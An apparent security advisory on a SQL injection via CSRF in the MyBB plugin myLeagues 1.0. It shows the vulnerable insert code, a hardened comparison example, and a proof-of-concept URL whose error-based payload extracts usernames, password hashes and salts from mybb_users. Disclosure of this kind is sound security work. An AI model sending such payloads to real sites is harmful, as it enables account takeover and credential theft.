MyBB Plugin myLeagues <= 1.0 SQL injection through CSRF


# Version: 1.0

SQL injection
-------------

admin/modules/config/myleagues.php L.174

$new_matchday = array(
        'no'        => (int) $mybb->input['no'],
        'name'      => $db->escape_string($mybb->input['name']),
        'league'    => $mybb->input['league'],   // neither cast nor escaped
        'startdate' => $startdate,
        'enddate'   => $enddate
);

$db->insert_query("myleagues_matchdays", $new_matchday);
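
The snippet above beside a hardened form, as an added example (not code from the plugin or from the advisory's author). `build_insert()`, `request_allowed()`, the `addslashes()` stand-in and the sample input are hypothetical; the integer cast assumes `league` is a numeric league id, and the date fields are left out for brevity.

```php
<?php
// Model of a query builder that quotes values without escaping them
// (assumption: a stand-in for $db->insert_query(), not MyBB's own code).
function build_insert(string $table, array $row): string
{
    $fields = '`' . implode('`,`', array_keys($row)) . '`';
    return "INSERT INTO {$table} ({$fields}) VALUES ('" . implode("','", $row) . "')";
}

// Before: 'league' goes into the row exactly as received.
function matchday_before(array $in): array
{
    return [
        'no'     => (int) $in['no'],
        'name'   => addslashes($in['name']), // stand-in for $db->escape_string()
        'league' => $in['league'],
    ];
}

// After: 'league' is cast like 'no' (assumption: it is a numeric league id).
function matchday_after(array $in): array
{
    $row = matchday_before($in);
    $row['league'] = (int) $in['league'];
    return $row;
}

// CSRF gate for the state-changing action: POST only, with a per-session token.
// In a MyBB module the token check would be verify_post_check() on my_post_key.
function request_allowed(string $method, string $sent, string $expected): bool
{
    return $method === 'POST' && hash_equals($expected, $sent);
}

// Constructed input: a harmless value that contains a single quote.
$in = ['no' => '1', 'name' => 'Round 1', 'league' => "1', 'x"];

// The quote in 'league' ends the string literal early and changes the statement.
echo build_insert('myleagues_matchdays', matchday_before($in)), "\n";
// With the cast, only the leading integer reaches the query.
echo build_insert('myleagues_matchdays', matchday_after($in)), "\n";

// A cross-site GET carrying no token is refused; a POST with the token passes.
var_dump(request_allowed('GET', '', 'constructed-token'));
var_dump(request_allowed('POST', 'constructed-token', 'constructed-token'));
```

The cast closes the injection; the method and token check removes the CSRF route that lets a non-admin reach the admin-only action.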

Proof of concept
----------------

Error-based injection (requires CSRF and XSS to get the data back if you are not an admin):
http://[site]/admin/index.php?module=config-myleagues&action=add_matchday&no=1&nEame=a&startdate_month=12&startdate_day=23&startdate_year=2000&enddate_month=12&enddate_day=30&enddate_year=2000&league=1%27,%20%272%27,%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28SELECT%20concat%28username,%200x3a,%20password,%200x3a,%20salt,%200x3a%29%20FROM%20mybb_users%20LIMIT%200,1%29,0x7e,%20floor%28rand%280%29*3%29%29%20as%20e%20from%20information_schema.tables%20group%20by%20e%29%20a%29%29--%20-

Groucho

